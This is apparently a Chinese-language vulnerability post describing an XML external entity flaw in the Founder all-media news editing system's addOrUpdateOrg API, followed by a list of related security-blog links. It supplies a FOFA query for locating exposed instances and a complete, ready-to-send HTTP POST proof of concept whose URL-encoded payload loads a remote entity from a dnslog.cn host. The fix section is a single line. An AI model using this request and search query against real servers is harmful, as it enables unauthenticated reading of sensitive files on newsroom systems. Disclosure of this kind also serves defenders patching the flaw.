方正畅享全媒体新闻采编系统 addOrUpdateOrg xxe漏洞

0x01 产品描述:

方正畅享全媒体新闻采编系统是一个集指挥中心、采集中心、编辑中心、发布中心、绩效考核中心和资料中心为一体的全媒体新闻采编系统‌,主要应用于媒体行业的深度融合,通过大数据和AI技术,实现新闻生产的策、采、编、发、存、传、评的全流程管理‌

0x02 漏洞描述:

方正畅享全媒体新闻采编系统 addOrUpdateOrg 接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
0x03 搜索语句:

Fofa:app="FOUNDER-全媒体采编系统"

0x04 漏洞复现:

POST /newsedit/api/orgUser/addOrUpdateOrg HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close

xmlStr=%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http://gli10h.dnslog.cn/%22%3E%20%25remote;%5D%3E

0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
鸭梨山大。1 小时前
Jenkins安全部署规范及安全基线
安全·中间件·jenkins
网安-轩逸1 小时前
网络安全核心目标CIA
安全·web安全
鸭梨山大。3 小时前
Jenkins 任意文件读取(CVE-2024-23897)修复及复现
安全·中间件·jenkins
黑客老陈4 小时前
新手小白如何挖掘cnvd通用漏洞之存储xss漏洞(利用xss钓鱼)
运维·服务器·前端·网络·安全·web3·xss
代码改变世界ctw10 小时前
如何学习Trustzone
安全·trustzone·atf·optee·tee·armv8·armv9
WTT001112 小时前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
群联云防护小杜15 小时前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡
ihengshuai15 小时前
HTTP协议及安全防范
网络协议·安全·http
黑客Jack16 小时前
防御 XSS 的七条原则
安全·web安全·xss
云云32117 小时前
怎么通过亚矩阵云手机实现营销?
大数据·服务器·安全·智能手机·矩阵